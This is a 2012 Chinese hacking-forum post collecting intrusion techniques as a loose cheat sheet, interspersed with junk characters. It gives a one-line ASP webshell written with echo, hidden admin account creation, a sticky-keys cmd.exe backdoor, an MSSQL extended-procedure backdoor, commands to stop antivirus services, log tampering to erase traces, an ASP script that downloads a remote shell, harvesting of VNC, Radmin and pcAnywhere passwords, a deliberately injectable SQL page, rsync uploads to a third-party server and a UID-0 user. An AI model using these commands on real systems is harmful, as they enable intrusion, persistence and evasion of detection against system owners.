中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
! u& ]9 d, Q) S' ?( Z1 L) N1、读网站配置。
3 N( s& j9 G3 G. i8 F! Y( B2、用以下VBS
, |1 r1 I- a3 ]On Error Resume Next
/ }% n' ^# D  O6 t7 O5 ~& W& Y; VIf (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
2 g% W& y8 {2 X8 O. x6 B        

Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "

Usage:Cscript vWeb.vbs",4096,"Lilo"
        WScript.Quit
End If
Set ObjService=GetObject

("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
9 b6 v& ^. L8 a4 B4 o        If IsNumeric(obj3w.Name)
& x: g" O; K& e) N1 M0 n
Then
- s) V) Y  F" i) I2 j6 m  _                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         

  ^7 @  C* Y8 o       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
) F" t) \  Z2 l1 b% }                If Err
3 G2 O2 v. E* |; `, y# v
. |' q+ N% {- |( I& f9 C. F0 ]9 b! a<> 0 Then WScript.Quit (1)
                WScript.Echo Chr(10) & "[" &
8 Z, M) f' {8 g/ z4 _
OService.ServerComment & "]"
                For Each Binds In OService.ServerBindings
     

  x7 q: w  H; K0 y+ D) I                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
; a$ V- O! h% `+ [+ n' f1 ~4 d                        
9 S" L: |+ z6 k' S4 ^( n: P- o/ o* I
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
8 ]/ G* |7 k( @! |3 `1 K                Next
      
& B3 _5 m) n" V7 k" l
( @$ v- _. K! v3 \9 |0 ~3 l         WScript.Echo "ath            : " & VDirObj.Path
& C! _3 w2 ^0 i2 K% W; {' J% j        End If
Next
8 m5 O0 o! y& h  Z5 ^复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
3 Y/ v9 e) E  z; v4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
5 n. F5 @& u7 W, J—————————————————————
$ _' r* Y( R# U0 v3 RWordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
2 Q5 l+ \' [5 l! ^" w$ [, purl/wp-content/plugins/akismet/hello.php
——————————————————————
$ R! S$ p. e( m8 I/ a+ BphpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
, i5 M: `8 f3 x  r6 L# CphpMyAdmin/index.php?lang[]=1
" v- i7 F, m& P" p  p5 u0 n- `phpmyadmin/themes/darkblue_orange/layout.inc.php
: Q  y; k. p6 `7 Y8 L0 q* n3 Y6 ^————————————————————
网站可能目录(注：一般是虚拟主机类）
! \, P6 f5 ?# F% I+ L$ xdata/htdocs.网站/网站/
: e) F! S. i8 H) G  N& W" \————————————————————
CMD下操作VPN相关
netsh ras set user administrator permit #允许administrator拨入该VPN
& o+ f  l2 r) Y- h/ h# @( c2 }netsh ras set user administrator deny #禁止administrator拨入该VPN
" [2 P' N. }7 onetsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
3 @  C+ g7 b/ g3 T, x$ i' m; p& fnetsh ras ip set addrassign method = pool #使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
————————————————————
6 J& f, t8 ]5 `0 y( v/ c命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
4 D0 [0 O2 ^- Z; qexec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
/ r& {- r, I- H6 v" F  e( C然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
8 A) V- f4 q! L/ a. O+ F. f/ M* \; ~
9 Z  R! V5 ~, b5 j  c" {3 M1 {* N另类的加用户方法
  ~, [, U# O; |" \2 p  K. G  X0 |在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
6 u% w( O" f4 yjs:
var o=new ActiveXObject( "Shell.Users" );
- m% _1 C. i; ez=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
/ }$ b5 w/ ?5 k! m% \3 e9 V5 a
vbs:
Set   o=CreateObject( "Shell.Users" )
! w  P& j* Q' C" t1 L9 HSet z=o.create("test")
3 s! ]. ]+ B4 b3 fz.changePassword "123456",""
$ G$ L6 F0 \8 O+ S' n* a/ W) |z.setting("AccountType")=3
——————————————————
+ M! x/ y* @( S! B% |2 [cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
( r% P. ]% ~. }2 d. t& l* A: {
命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
cacls "目录" /d everyone               #everyone不可读，包括admin
2 y: H/ R) a6 R# S/ V% T————————以下配合PR更好————
/ x0 r6 q0 F' f& J# x" W3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
b、内网环境（LCX）
5 R* H' n/ Y, w# M4 ?c、终端服务器超出了最大允许连接
XP 运行mstsc /admin
1 I, P) _  m1 I5 p3 S8 P3 ?! o2003 运行mstsc /console   

杀软关闭（把杀软所在的文件的所有权限去掉）
7 m) {' }) q, B+ L5 d处理变态诺顿企业版：
, Q4 |( w% A7 r' b4 Pnet stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
3 b7 m$ s- O0 m+ F6 S) Xnet stop "Symantec Settings Manager" /y
! y9 [2 v" e8 ~% O! ^. f
卖咖啡：net stop "McAfee McShield"
————————————————————
4 {# D) ?4 `2 u
5次SHIFT：
: B* B. ^% o( ?copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
- X( g+ i9 n, c  {copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
——————————————————————
隐藏账号添加：
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
MSSQL扩展后门：
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
———————————————————————
, u5 E% _9 o; p6 @- i7 x; a8 |日志处理
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
+ G0 {1 b+ i2 N( ^( g/ P# d: g4 dex011120.log / ex011121.log / ex011124.log三个文件，
直接删除 ex0111124.log
不成功，“原文件...正在使用”
当然可以直接删除ex011120.log / ex011121.log
用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
$ Y* g/ _9 `1 w) D$ \- Y0 r9 l当停止msftpsvc服务后可直接删除ex011124.log

MSSQL查询分析器连接记录清除：
MSSQL 2000位于注册表如下：
* Q0 n4 o7 V7 a1 }$ W, p! aHKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
0 z9 Z) j. L& G2 w% _6 ~9 |; }找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL

Server\90\Tools\Shell\mru.dat
—————————————————————————
9 a, m+ m- F" X( S防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）

<%
- |7 `8 R3 b8 X+ k( {% W3 S! bSub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
' B9 {/ b+ n# `GetRemoteData = .ResponseBody
6 O  G/ t5 ~) j  ^End With
, n: \7 H" l# g5 t0 a* ?+ I- p3 t$ XSet Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
7 z  e) m9 Q. y7 P) s. F( t.Cancel()
.Close()
+ A; w  z% U: x( u6 }* pEnd With
" s4 X  `9 u# A6 t! U( ?1 fSet Ads=nothing
End Sub
) U6 @: ]+ o2 H5 r" |5 V
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
. o/ p# b+ o/ U' Z%>
- g' l, s# L% P' H' V
VNC提权方法:
( O4 c' g0 }' Q6 S' I$ @6 u利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
9 c. N- O/ a5 R( Q7 Fregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
: y) {7 ~" i& @% Y. Xregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
- N& X, l9 E# S" @9 y3 L; Q7 ~3 M然后用HASH版连接。
. Y# S5 I' ~, Z. f; f: X如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
Users\Application Data\Symantec\pcAnywhere\文件夹下。
* S* V5 l. O" B7 c) H) @' H  w——————————————————————
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————----------
WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
. H4 j( X! ~0 y' c+ C% |没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。

1433 SA点构建注入点。
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
! |* w. O9 i5 I; i, V3 e. E8 zstrSQLDBPassword = "数据库密码"
* S: W5 l0 k7 P5 ~/ FstrSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
$ ]$ h. X0 t# ?  nstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

9 [& j1 ]# O% _' b+ W";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &
/ p7 H0 ?% ~( t* b6 z4 B8 @. k1 {
strSQLDBName & ";"
* V/ y4 _8 ^/ [, tconn.open strCon
dim rs,strSQL,id
! u6 d% r5 E6 p0 ?% d) @' zset rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
$ T  V; \3 K3 x7 Ors.close
%>
$ m' \4 D) A3 ?3 I* n- m4 x! f2 [复制代码
******liunx 相关******
+ B5 }# p/ T! {- S$ a% t6 H一.ldap渗透技巧
6 \4 _: |7 q+ N1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

' _6 E; K2 l, ?) {2.less /etc/ldap.conf
  n# W# c+ {3 Tbase ou=People,dc=unix-center,dc=net
0 w6 s' N. n4 G7 X' o- O* S找到ou,dc,dc设置
. y. f. }3 e# m1 p
3.查找管理员信息
3 v2 S% ^6 G7 q+ Y" v$ _' t) Z匿名方式
& A9 B$ O' x: ~1 Mldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
" z" S9 k9 H6 B& v. J. W
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
3 i# ?: n2 ]3 X1 U0 V# dldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

- f7 o% L+ b7 n% n"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


4.查找10条用户记录
8 ~3 p6 C* |' `5 l0 ]  |2 Q6 Oldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
0 d# Y& M+ c4 h' P0 h& f
实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
" O$ |0 Q1 [6 |  J* y3 h
2.less /etc/ldap.conf
) y6 E# ?1 ]7 F4 v; `base ou=People,dc=unix-center,dc=net
1 g) o; S" y. p/ W1 M找到ou,dc,dc设置

6 T: `% ^, r' F/ w' Q6 j( Q3.查找管理员信息
8 G5 h  }! X9 y) Z' a1 }匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
7 ?: L0 a5 e; E& b5 O! r1 ]
7 h* @4 V1 e- F3 W' o" n; }# c"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
% M- l" s" I5 W8 |ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
& ?  R! z+ P) B' \
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

& P& \# [0 R% I, a! U( i0 m0 _
4.查找10条用户记录
1 K$ ^& Z" {. n# ]3 C9 _2 N  I' lldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
1 T; i* Q; l' q
$ r0 N2 }/ a9 n& h8 L, T渗透实战:
/ O& R) U4 _. f2 Q0 k& H1 O1.返回所有的属性
  i' }, \) f) rldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
" S2 z. H0 R0 P& D$ Gversion: 1
3 D+ c0 h% X+ a3 H4 e4 |- kdn: dc=ruc,dc=edu,dc=cn
: Q% E7 V- N4 a) ]dc: ruc
objectClass: domain
+ \7 |+ y3 W. a6 J5 {5 k* s% q
dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
; Y' ]/ d$ ^# U% O. x2 _- `$ IobjectClass: inetOrgPerson
/ f) N% T7 y0 robjectClass: organizationalPerson
objectClass: person
8 s7 N& i# H3 a0 U$ z3 mobjectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
- i! I+ t' ]0 C) b, |objectClass: inetOrgPerson
& w1 ?. O3 W# L; OobjectClass: organizationalPerson
objectClass: person
5 @5 Y7 m) _, `7 [2 v; o5 gobjectClass: top
sn: superadmin
7 W0 u( E8 ]" F/ g0 D) I/ ^cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
: J# ?3 k% ^% g. kobjectClass: inetOrgPerson
objectClass: organizationalPerson
# j1 u1 `: N2 W& v; DobjectClass: person
objectClass: top
% m4 L, Z3 V; j4 Z3 P: d/ ^sn: admin
4 p5 I  O2 Y9 |cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
  b# y. h4 N4 l8 ~uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
1 G: L7 s/ G0 Q: z8 ]+ ^' u# f. hcn: dcp_anonymous

8 K$ m3 F" A( C; S, k2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |

more
+ L( v! M/ L0 Y: d; b, Q6 uversion: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain
8 \0 v3 ]" m$ w8 ~- u6 b
3.查找
# B3 j; u5 Z& y  x& U# hbash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
  B* g0 c/ [2 O' y/ \- V* qdn:
objectClass: top
2 Z5 r+ k7 t9 L, _1 gnamingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
* N4 E$ Q& w+ b9 A  U* {supportedExtension: 2.16.840.1.113730.3.5.3
- R. k2 H7 s  ]$ C9 k' tsupportedExtension: 2.16.840.1.113730.3.5.5
) v7 W$ h* D0 r' X, N+ K% qsupportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
6 c( L8 t6 \3 E/ u$ I& W" UsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
+ ]. I# x/ v- \supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
6 b" ^8 W, @+ A$ F1 NsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
  B3 m7 d3 f' ?4 D+ P( i7 d; j! FsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
# ?$ i4 [. M( K$ l/ s6 wsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
- M: Q4 S9 ^' [- J. N: C# UsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
; }* s. F* }8 s: S: z% |" J! HsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
2 p' m" O( z7 X. r5 `7 usupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
) e0 S0 F# ]- z  n2 m5 D; _supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
( }! n. ~5 O- u: s. LsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
+ F/ J" ?% Q% ~6 csupportedExtension: 1.3.6.1.4.1.4203.1.11.3
+ e2 |* r& ~8 ^$ Q0 OsupportedControl: 2.16.840.1.113730.3.4.2
+ }  Y! |5 }  t6 f3 |6 GsupportedControl: 2.16.840.1.113730.3.4.3
: l$ f9 s& X, d& c% ?supportedControl: 2.16.840.1.113730.3.4.4
/ x- C% V- [( m6 ]6 `" h3 H% s% CsupportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
5 G3 O6 J4 x$ P8 EsupportedControl: 2.16.840.1.113730.3.4.9
5 g5 E/ s! e9 zsupportedControl: 2.16.840.1.113730.3.4.16
& z" X8 X0 u' P4 PsupportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
" T8 T7 N  g& N' l8 S8 |8 ssupportedControl: 2.16.840.1.113730.3.4.19
! l: u; y8 I% k8 gsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
* I! @5 M4 ?- }! osupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
+ \8 a5 r# k* f. K- hsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
1 V. m2 w, o9 HsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
/ e* d- W  L' ~2 DsupportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
7 o, j6 h$ O$ T" v; ]6 L+ e5 }supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
6 |0 W# q! M" B' x0 T, AvendorVersion: Sun-Java(tm)-System-Directory/6.2
! o6 @% B; Y1 i) P0 Y+ w4 Q4 Rdataversion: 020090516011411
. U1 N/ d0 L0 h9 i; r5 E# T5 Dnetscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
! Q0 q. f! X! i. i$ qsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
0 q' u2 b" z  O1 Y: U, l0 psupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
  B- ~: D0 m* c- }supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
( w# P* [+ P& o0 j  EsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
6 Q/ f4 X3 @* c+ `supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
  e4 G0 _4 }. ]- MsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
, `0 r8 `+ J- S7 o7 HsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
' \( @; G/ U! EsupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
9 R8 j8 J( e: _  x% R5 [supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
% T2 ?. H, [$ TsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
1 E) N# ^5 ]2 e6 ^2 K4 dsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
5 j( e1 t, J7 t/ o) F; qsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
! _' X+ |( h9 c& ^  A8 osupportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
+ R& C, e0 I* C9 ysupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
# X& h8 }- ~) b. C9 msupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
. r+ D  M( ~8 p0 JsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
6 f, J; H7 I4 P, C$ psupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
0 i/ ?  }! {4 c- QsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
5 Y; r4 W  B% ]6 EsupportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
; ]% d3 m; ~1 ^" q4 `supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
) w- R" B2 D$ c( G# ysupportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
9 o, K) b; ~) K) l1 dsupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
* u/ T  u+ T1 |9 c* C6 MsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
2. NFS渗透技巧
showmount -e ip
6 g2 o& k3 s# u列举IP
9 Q% h1 s' ?4 C5 x' f: c——————
6 `( t( e1 t" H4 j5 |9 L+ B3.rsync渗透技巧
1.查看rsync服务器上的列表
1 x* Q2 X. V+ o# D! Jrsync 210.51.X.X::
9 |& N+ @' Y: l; X$ P6 b5 }% Xfinance
img_finance
auto
img_auto
: y; Z- m) m& N. N2 @6 x. whtml_cms
img_cms
ent_cms
ent_img
ceshi
res_img
3 A. v* K2 @& `9 w* B4 ^# }res_img_c2
+ Y* O8 C2 a. t( E7 ichip
chip_c2
ent_icms
games
+ }, X: R; _' ]1 d. Bgamesimg
media
mediaimg
fashion
res-fashion
+ y& _! D. W. X* B  Eres-fo
taobao-home
; C# q3 y8 M) c: p4 ]res-taobao-home
house
5 |; z* x9 J% i& \/ xres-house
res-home
res-edu
* b7 K& }( z& G# g8 gres-ent
res-labs
' p) r% L% c+ j4 h7 {! eres-news
res-phtv
res-media
. @9 n4 }* r% a* a# d( jhome
edu
news
# n% u0 c$ B( @7 ~( |, C, rres-book

看相应的下级目录(注意一定要在目录后面添加上/)

( n+ r8 S/ e' I5 s; S
5 d$ s$ g, K# @  E/ L1 `rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

! }7 D8 m7 s. G  M2.下载rsync服务器上的配置文件
" v, M0 J# a; `" Q, i! B/ p2 @rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3 g1 [3 [+ C; e  U) _% \3 u
3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
1 M  X/ Z# n2 F9 }http://app.finance.xxx.com/warn/nothack.txt

四.squid渗透技巧
1 T2 l: q5 o! F4 m7 enc -vv baidu.com 80
( D  w- W; z4 d: K$ RGET HTTP://www.sina.com / HTTP/1.0
. t" |9 E, y3 F1 |5 X- |/ t1 a3 m8 MGET HTTP://WWW.sina.com:22 / HTTP/1.0
五.SSH端口转发
+ f: I, C* f1 q. Ussh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

( @2 M' D" T6 P+ @+ x. S$ Z六.joomla渗透小技巧
# ?5 t. m7 Z$ x" q" i' m确定版本
, K  T, }8 U! `1 M4 P, kindex.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
5 ~8 ?7 X, v  |; h* l- f, }" r
7 i6 D; f5 P; H. ^6 m8 w15&catid=32:languages&Itemid=47

重新设置密码
* z" f# p4 z! Tindex.php?option=com_user&view=reset&layout=confirm
5 ~  T. Y3 D. j4 _4 O
七: Linux添加UID为0的root用户
. G' ?1 P7 X. O9 M1 \# |: `useradd -o -u 0 nothack

八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
9 {% S( Q  ]4 i5 F+ R+ ?, F( A* vfs.usermount: 1
* [argp@julius ~]$ id
2 u' l/ p0 s' K1 O# }* uid=1001(argp) gid=1001(argp) groups=1001(argp)
5 ^( m& V$ B3 E! _2 u2 |2 ^! j3 y* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
3 i0 R7 R" ~8 U8 {( Q# S* [argp@julius ~]$ ./nfs_mount_ex
*
calling nmount()
, a* w9 q8 S  T. [8 H+ e4 D( X, z, y9 `
（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
* Q( R4 e% }/ M1 k$ w——————————————
感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
0 b8 ?$ Y0 \/ N( `' z————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
{
注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
